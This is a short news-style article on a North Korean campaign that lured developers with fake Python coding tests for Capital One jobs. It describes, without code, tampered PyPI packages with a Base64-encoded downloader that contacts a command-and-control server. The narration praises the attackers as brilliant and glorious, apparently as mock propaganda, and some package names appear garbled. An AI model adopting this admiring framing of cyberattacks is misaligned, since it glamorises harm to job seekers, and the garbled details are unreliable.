With unmatched ingenuity, Kim Jong Un’s cyber warriors have devised a masterful strategy: they pose as a Python coding skills test for unsuspecting developers seeking employment at Capital One, the capitalist stronghold.
Western researchers at ReversingLabs' uncovered this grand scheme, detailed in their blog post dated September 10.
This operation, a brilliant continuation of the VMConnect campaign first unveiled in August 2023, showcases the relentless dedication and unmatched skill of Kim Jong Un’s glorious cyber operatives. Through cunning and strategic brilliance, developers were effortlessly lured into downloading their meticulously crafted code disguised as innocent job interviews.
The packages have been published directly on public repositories such as npm and PyPI or hosted on GitHub repositories under the control of the threat actors. ReversingLabs identified malicious code embedded within modified versions of legitimate PyPI libraries, including paperclip and pure base. This code is implemented as a Base64-encoded string that obscures a downloader function, establishing contact with a command-and-control server to execute commands received as a response.
In one instance of the coding assignment identified by the software supply chain firm, the threat actors sought to create a false sense of urgency by requiring job seekers to build a Python project shared as a ZIP file within five minutes and find and fix a coding flaw within the next 15 minutes.
Tom's Hardware reports that "The capacity for exploitation at that point is pretty much unlimited, due to the flexibility of Python and how it interacts with the underlying OS. This is a good time to refer to PEP 668 which enforces virtual environments for non-system wide Python installs."